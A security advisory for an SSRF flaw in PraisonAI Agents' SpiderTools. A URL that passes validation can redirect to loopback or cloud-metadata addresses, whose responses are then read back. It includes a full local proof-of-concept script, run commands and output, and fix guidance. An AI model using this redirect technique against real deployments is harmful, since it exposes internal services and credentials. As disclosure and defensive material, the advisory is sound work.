# SpiderTools redirect-target SSRF protection bypass
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| PraisonAI Agents | pip | <= 1.6.58 | 1.6.59 |
If you use PraisonAI Agents 1.6.58 or earlier, you are affected.
What should I do?
A patch is available: update PraisonAI Agents to version 1.6.59.
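To check whether a Python environment still has a vulnerable build installed, before or after upgrading, a small standard-library sketch is shown below. It assumes the pip distribution is named `praisonaiagents` (the package name used in the related-vulnerability list) and compares only the numeric release segment against the first patched version, 1.6.59. `parse_release`, `is_vulnerable`, and `installed_status` are illustrative helpers, not part of PraisonAI.

```python
import re
from importlib.metadata import PackageNotFoundError, version

# Assumption: the pip distribution name is "praisonaiagents".
DIST_NAME = "praisonaiagents"
FIRST_PATCHED = (1, 6, 59)


def parse_release(ver: str) -> tuple:
    """Return the leading numeric release segment, e.g. "1.6.58" -> (1, 6, 58).

    Pre-release and local suffixes ("rc1", "+local") are ignored, which is a
    simplification; packaging.version.Version handles full PEP 440 ordering.
    """
    match = re.match(r"\d+(?:\.\d+)*", ver)
    if match is None:
        raise ValueError(f"unparseable version: {ver!r}")
    return tuple(int(part) for part in match.group(0).split("."))


def is_vulnerable(ver: str) -> bool:
    """True if `ver` falls in the advisory's vulnerable range (<= 1.6.58)."""
    return parse_release(ver) < FIRST_PATCHED


def installed_status() -> str:
    """Describe the locally installed praisonaiagents version, if any."""
    try:
        installed = version(DIST_NAME)
    except PackageNotFoundError:
        return f"{DIST_NAME} is not installed"
    verdict = "VULNERABLE, upgrade to 1.6.59" if is_vulnerable(installed) else "patched"
    return f"{DIST_NAME} {installed}: {verdict}"


print(installed_status())
```

Tuple comparison treats a shorter release such as `1.6` as older than `1.6.59`, which matches how pip orders these versions.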
Frequently Asked Questions
What is GHSA-6h9p-93hq-q7h6?
## Summary

`SpiderTools.scrape_page()` validates the initial URL and rejects direct loopback, private, link-local, metadata, and internal hostnames. It then calls `requests.Session.get()` without disabling automatic redirects or validating redirect `Location` targets. Requests follows redirects by default for GET requests. A safe-looking public URL can therefore pass `_validate_url()`, redirect to a blocked target such as `127.0.0.1` or `169.254.169.254`, and have the redirected response body parsed and returned by `scrape_page()`.

The same sink is used by `extract_links()`, `crawl()`, and `extract_text()` through their calls to `scrape_page()`.

## Affected component

```text
src/praisonai-agents/praisonaiagents/tools/spider_tools.py
```

Versions tested and found affected:

- `v3.9.24` / `d08d98ca`
- `v3.9.26` / `62472a23`
- `v4.6.56` / `d3c4a2af`
- `v4.6.57` / `e90d92231853161ad931f3498da57651a9f8b528`
- current main `2f9677abb2ea68eab864ee8b6a828fd0141612e1`

No patched version is known at report time.

## Root cause

Current main validates only the caller-supplied URL:

```python
if not self._validate_url(url):
    return {"error": f"Invalid or potentially dangerous URL: {url}"}
```

The fetch then uses Requests defaults:

```python
response = session.get(
    url,
    timeout=timeout,
    verify=verify_ssl
)
```

Because `allow_redirects=False` is not set, Requests follows a 3xx redirect to a new destination that has not been checked by `_validate_url()` or `_host_is_blocked()`.

## Proof of vulnerability

The PoV below is local-only and does not contact external infrastructure. It starts a loopback-only internal service and a local redirector. During PraisonAI's initial host validation, `attacker.test` is made to look like a public address. During the actual HTTP request, it routes to the local redirector, which returns `302 Location: http://127.0.0.1:<port>/secret`.
Full PoV:

```python
#!/usr/bin/env python3
"""Local PoV for SpiderTools redirect-target SSRF.

This uses only loopback services. The "attacker" hostname is treated as public
during PraisonAI's initial URL validation, then routed to a local redirector so
the PoV does not contact external infrastructure. The redirector points at a
loopback-only internal service. Vulnerable behavior is confirmed when
SpiderTools follows that redirect and returns the internal response body.
"""

from __future__ import annotations

import http.server
import importlib.util
import inspect
import os
import socket
import socketserver
import threading
from typing import Any


def _load_spider_tools_class():
    module_file = os.environ.get("PRAISONAI_SPIDER_TOOLS_FILE")
    if module_file:
        spec = importlib.util.spec_from_file_location("pov_spider_tools", module_file)
        if spec is None or spec.loader is None:
            raise RuntimeError(f"Could not load spider_tools file: {module_file}")
        module = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(module)
        return module.SpiderTools

    from praisonaiagents.tools.spider_tools import SpiderTools

    return SpiderTools


class InternalHandler(http.server.BaseHTTPRequestHandler):
    body = b"SPIDER-INTERNAL-SECRET"

    def do_GET(self) -> None:  # noqa: N802
        self.server.hit = True  # type: ignore[attr-defined]
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(self.body)))
        self.end_headers()
        self.wfile.write(self.body)

    def log_message(self, *_args: Any) -> None:
        return


class RedirectHandler(http.server.BaseHTTPRequestHandler):
    target = ""

    def do_GET(self) -> None:  # noqa: N802
        self.server.hit = True  # type: ignore[attr-defined]
        self.send_response(302)
        self.send_header("Location", self.target)
        self.end_headers()

    def log_message(self, *_args: Any) -> None:
        return


def _called_from_spider_host_guard() -> bool:
    return any(frame.function == "_host_is_blocked" for frame in inspect.stack())


def main() -> int:
    os.environ.pop("ALLOW_LOCAL_CRAWL", None)

    internal = socketserver.TCPServer(("127.0.0.1", 0), InternalHandler)
    internal.hit = False  # type: ignore[attr-defined]
    internal_port = internal.server_address[1]

    RedirectHandler.target = f"http://127.0.0.1:{internal_port}/secret"
    redirect = socketserver.TCPServer(("127.0.0.1", 0), RedirectHandler)
    redirect.hit = False  # type: ignore[attr-defined]
    redirect_port = redirect.server_address[1]

    threading.Thread(target=internal.serve_forever, daemon=True).start()
    threading.Thread(target=redirect.serve_forever, daemon=True).start()

    original_getaddrinfo = socket.getaddrinfo

    def fake_getaddrinfo(host: str, port: int, *args: Any, **kwargs: Any):
        if host == "attacker.test":
            if _called_from_spider_host_guard():
                return [
                    (
                        socket.AF_INET,
                        socket.SOCK_STREAM,
                        6,
                        "",
                        ("93.184.216.34", port),
                    )
                ]
            return original_getaddrinfo("127.0.0.1", port, *args, **kwargs)
        return original_getaddrinfo(host, port, *args, **kwargs)

    tool = _load_spider_tools_class()()
    socket.getaddrinfo = fake_getaddrinfo
    try:
        direct_control = tool.scrape_page(
            f"http://127.0.0.1:{internal_port}/secret",
            timeout=5,
        )
        redirect_result = tool.scrape_page(
            f"http://attacker.test:{redirect_port}/go",
            timeout=5,
        )
        vulnerable_redirect_hit = bool(redirect.hit)  # type: ignore[attr-defined]
        vulnerable_internal_hit = bool(internal.hit)  # type: ignore[attr-defined]

        redirect.hit = False  # type: ignore[attr-defined]
        internal.hit = False  # type: ignore[attr-defined]

        import requests

        original_session_get = requests.Session.get

        def no_redirect_get(self, url, **kwargs):  # type: ignore[no-untyped-def]
            kwargs.setdefault("allow_redirects", False)
            return original_session_get(self, url, **kwargs)

        requests.Session.get = no_redirect_get
        try:
            no_redirect_control = _load_spider_tools_class()().scrape_page(
                f"http://attacker.test:{redirect_port}/go",
                timeout=5,
            )
        finally:
            requests.Session.get = original_session_get

        no_redirect_redirect_hit = bool(redirect.hit)  # type: ignore[attr-defined]
        no_redirect_internal_hit = bool(internal.hit)  # type: ignore[attr-defined]
    finally:
        socket.getaddrinfo = original_getaddrinfo
        redirect.shutdown()
        internal.shutdown()
        redirect.server_close()
        internal.server_close()

    print("DIRECT_CONTROL:", direct_control)
    print("REDIRECT_RESULT:", redirect_result)
    print("REDIRECT_SERVER_HIT:", vulnerable_redirect_hit)
    print("INTERNAL_SERVER_HIT:", vulnerable_internal_hit)
    print("NO_REDIRECT_CONTROL:", no_redirect_control)
    print("NO_REDIRECT_SERVER_HIT:", no_redirect_redirect_hit)
    print("NO_REDIRECT_INTERNAL_HIT:", no_redirect_internal_hit)

    if not isinstance(direct_control, dict) or "dangerous URL" not in str(direct_control):
        raise SystemExit("control failed: direct loopback was not blocked")
    if not isinstance(redirect_result, dict) or "error" in redirect_result:
        raise SystemExit(f"bypass failed: unexpected result {redirect_result!r}")
    if "SPIDER-INTERNAL-SECRET" not in str(redirect_result.get("content", "")):
        raise SystemExit("bypass failed: internal body was not returned")
    if not vulnerable_redirect_hit or not vulnerable_internal_hit:
        raise SystemExit("bypass failed: expected local servers were not hit")
    if not no_redirect_redirect_hit or no_redirect_internal_hit:
        raise SystemExit("fix control failed: no-redirect mode reached internal service")

    print("PRAI-CAND-004 CONFIRMED: SpiderTools follows a redirect to loopback")
    return 0


if __name__ == "__main__":
    raise SystemExit(main())
```

Run:

```fish
cd /Users/rexliu/Documents/GA\ code/REDit\ Deployment/stack/deploy
env PRAISONAI_SPIDER_TOOLS_FILE=/path/to/PraisonAI/src/praisonai-agents/praisonaiagents/tools/spider_tools.py \
  uv run --with requests --with beautifulsoup4 --with lxml --python 3.11 \
  poc_spider_tools_redirect_ssrf.py
```

Observed on current main:

```text
DIRECT_CONTROL: {'error': 'Invalid or potentially dangerous URL: http://127.0.0.1:<port>/secret'}
REDIRECT_RESULT: {'url': 'http://attacker.test:<port>/go', 'status_code': 200, ... 'content': 'SPIDER-INTERNAL-SECRET', ...}
REDIRECT_SERVER_HIT: True
INTERNAL_SERVER_HIT: True
NO_REDIRECT_CONTROL: {'url': 'http://attacker.test:<port>/go', 'status_code': 302, ... 'Location': 'http://127.0.0.1:<port>/secret', ...}
NO_REDIRECT_SERVER_HIT: True
NO_REDIRECT_INTERNAL_HIT: False
PRAI-CAND-004 CONFIRMED: SpiderTools follows a redirect to loopback
```

The direct control proves direct loopback is blocked. The redirect result proves the same blocked destination is reached through a public-looking initial URL. The no-redirect control proves that disabling automatic redirects prevents the internal request while still receiving the external redirect response.

## Why this is not intended behavior

The Spider Tools documentation says `scrape_page`, `extract_links`, `crawl`, and `extract_text` refuse dangerous URLs before network requests. The documented blocked classes include loopback, private/reserved IPs, link-local/cloud metadata endpoints, internal TLDs, non-HTTP(S) schemes, and parser-smuggling forms. The same page states the validation is always on for bundled spider tools and does not require `enable_security()`.

The current code also documents `_validate_url()` as URL validation "to prevent SSRF attacks." A redirect to a loopback target bypasses that documented protection.

## Impact

An attacker who can influence a URL passed to `scrape_page()`, `extract_links()`, `crawl()`, or `extract_text()` can cause the PraisonAI process to request destinations that SpiderTools is designed to block.

Potential impact includes:

- reading loopback-only HTTP services;
- probing or reading private network services reachable from the PraisonAI host;
- reading link-local/cloud metadata endpoints if reachable in the deployment environment.

The PoV demonstrates returned response-body disclosure from a loopback-only service. This report does not claim arbitrary code execution or live cloud credential theft without deployment-specific evidence.
## Severity

Suggested default severity: Moderate.

High severity may be appropriate for deployments where untrusted users can directly invoke SpiderTools through a network-facing agent, bot, API, or MCP service and sensitive internal or metadata services are reachable.

## Suggested fix

Disable automatic redirects in `scrape_page()`:

```python
response = session.get(
    url,
    timeout=timeout,
    verify=verify_ssl,
    allow_redirects=False,
)
```

If redirects should remain supported, follow them manually and validate every `Location` target before each hop using the same SSRF guard:

- require `http` or `https`;
- resolve and validate every redirect hostname;
- reject loopback, private, link-local, reserved, multicast, unspecified, internal, and metadata destinations;
- cap redirect count;
- apply the same safe fetch path to `scrape_page()`, `extract_links()`, `crawl()`, and `extract_text()`.

Regression tests should cover direct loopback rejection, public-to-loopback redirect rejection, public-to-public redirects if supported, and all `scrape_page()` callers.
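The manual-redirect option in the suggested fix can be sketched in Python as follows. This is a minimal sketch, not PraisonAI's patched code: `is_url_allowed`, `fetch_with_checked_redirects`, and `BLOCKED_HOST_SUFFIXES` are hypothetical names, and the validator approximates the advisory's blocked classes with the standard library's `ipaddress` properties instead of calling SpiderTools' own `_validate_url()` or `_host_is_blocked()`. The fetch function is injected, so any client call that does not follow redirects by itself can be plugged in.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

# Hypothetical blocklist of internal name suffixes; SpiderTools' real list may differ.
BLOCKED_HOST_SUFFIXES = (".internal", ".local", ".localhost")
REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def is_url_allowed(url: str) -> bool:
    """Allow only http(s) URLs whose host resolves exclusively to public addresses."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    host = parts.hostname.lower().rstrip(".")
    if host == "localhost" or host.endswith(BLOCKED_HOST_SUFFIXES):
        return False
    try:
        infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    except (socket.gaierror, UnicodeError):
        return False
    for info in infos:
        # Drop any IPv6 zone suffix such as "%eth0" before parsing.
        addr = ipaddress.ip_address(info[4][0].split("%")[0])
        # is_global is False for loopback, private, link-local (which includes the
        # 169.254.169.254 metadata address), reserved, and unspecified addresses;
        # some multicast ranges count as global, so reject multicast explicitly.
        if not addr.is_global or addr.is_multicast:
            return False
    return bool(infos)


def fetch_with_checked_redirects(url, fetch, max_redirects=5):
    """Follow redirects by hand, validating every target before requesting it.

    `fetch(url)` must not follow redirects itself and must return an object with
    `.status_code` and `.headers`, e.g. a Requests response obtained with
    allow_redirects=False.
    """
    for _ in range(max_redirects + 1):
        if not is_url_allowed(url):
            raise ValueError(f"Invalid or potentially dangerous URL: {url}")
        response = fetch(url)
        location = response.headers.get("Location")
        if response.status_code not in REDIRECT_STATUSES or not location:
            return response
        # Location may be relative; resolve it against the URL that returned it.
        url = urljoin(url, location)
    raise ValueError(f"Too many redirects (limit {max_redirects})")
```

With Requests, the fetch argument could be `lambda u: session.get(u, timeout=timeout, verify=verify_ssl, allow_redirects=False)`. Because each hop is validated before it is requested, a public-to-loopback redirect is rejected without the loopback target ever being contacted. One caveat: the hostname is resolved once for validation and again by the HTTP client when it connects, so this sketch does not by itself defeat DNS rebinding, which is the same validation/connection split the PoV simulates with its patched `getaddrinfo`. Pinning the connection to the validated address closes that gap.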
Is GHSA-6h9p-93hq-q7h6 actively exploited?
No confirmed active exploitation of GHSA-6h9p-93hq-q7h6 has been reported, but organizations should still patch proactively.
How to fix GHSA-6h9p-93hq-q7h6?
Update to patched version: PraisonAI Agents 1.6.59.
What is the CVSS score for GHSA-6h9p-93hq-q7h6?
GHSA-6h9p-93hq-q7h6 has a CVSS v3.1 base score of 6.5 (MEDIUM).
Weaknesses (CWE)
CWE-918 — Server-Side Request Forgery (SSRF): The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
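The 6.5 base score follows directly from this vector. As a sketch, assuming the base-score equations, metric weights, and Roundup function of the FIRST CVSS v3.1 specification (the function and table names here are illustrative), the calculation is:

```python
import math

# CVSS v3.1 base-metric weights.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(value: float) -> float:
    """Smallest one-decimal number >= value, computed to avoid float artifacts."""
    int_input = round(value * 100_000)
    if int_input % 10_000 == 0:
        return int_input / 100_000.0
    return (math.floor(int_input / 10_000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the CVSS v3.1 base score for a full base-metric vector string."""
    parts = vector.split("/")
    if parts[0] != "CVSS:3.1":
        raise ValueError("expected a CVSS:3.1 vector")
    metrics = dict(part.split(":") for part in parts[1:])
    changed = metrics["S"] == "C"

    # Impact sub-score, using the scope-dependent formula.
    iss = 1 - (1 - CIA[metrics["C"]]) * (1 - CIA[metrics["I"]]) * (1 - CIA[metrics["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss

    # Exploitability sub-score; PR weights depend on scope.
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[metrics["PR"]]
    exploitability = 8.22 * AV[metrics["AV"]] * AC[metrics["AC"]] * pr * UI[metrics["UI"]]

    if impact <= 0:
        return 0.0
    if changed:
        return roundup(min(1.08 * (impact + exploitability), 10))
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"))  # 6.5
```

For this vector the impact sub-score is 6.42 × 0.56 ≈ 3.60 and exploitability is 8.22 × 0.85 × 0.77 × 0.85 × 0.62 ≈ 2.84; their sum, about 6.43, rounds up to 6.5. The `UI:R` (user interaction required) metric is what keeps the score below the 7.5 the same vector would receive with `UI:N`.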
Related Vulnerabilities
All of the following affect the same package, `praisonaiagents`:

| ID | CVSS | Summary |
|---|---|---|
| CVE-2026-39888 | 10.0 | praisonaiagents: sandbox escape enables host RCE |
| CVE-2026-34938 | 10.0 | praisonaiagents: sandbox bypass enables full host RCE |
| CVE-2026-47392 | 9.9 | praisonaiagents: RCE via Python sandbox bypass |
| GHSA-vc46-vw85-3wvm | 9.8 | PraisonAI: RCE via malicious workflow YAML execution |
| CVE-2026-47391 | 9.8 | PraisonAI: Unauth RCE via A2A eval injection |